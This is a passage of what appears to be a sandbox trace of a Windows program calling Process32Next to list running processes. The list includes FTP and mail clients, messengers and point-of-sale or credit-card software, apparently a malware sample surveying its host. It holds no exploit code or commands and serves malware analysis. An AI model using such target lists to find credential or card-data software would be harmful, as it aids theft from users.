szExeFile="dwm.exe")) returned 1 [0177.918] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.920] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.922] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.932] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.934] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.936] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.938] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.940] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.950] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.953] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.956] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.959] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.961] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0177.963] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.966] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0177.968] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.970] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.985] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.987] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.989] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.995] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0177.997] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0178.000] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.002] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.140] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.143] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.146] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0178.148] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0178.150] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0178.153] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0178.156] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0178.158] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0178.281] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0178.284] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0178.288] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0178.290] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0178.292] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0178.293] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0178.295] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0178.297] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0178.299] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0178.301] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0178.303] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0178.304] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0178.306] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0178.309] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0178.312] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0178.316] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0178.318] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0178.327] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0178.331] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0178.335] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0178.337] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0178.340] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0178.343] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0178.345] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0178.348] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0178.350] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0178.353] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0178.355] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0178.357] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0178.359] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0178.362] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0178.368] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0178.370] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0178.373] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0178.374] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0178.376] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0178.379] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0178.380] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0178.382] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0178.384] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0178.386] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0178.388] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0178.389] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0178.392] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0178.394] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0178.395] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0178.397] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0178.401] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0178.403] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0178.407] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0178.409] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0178.411] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0178.413] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 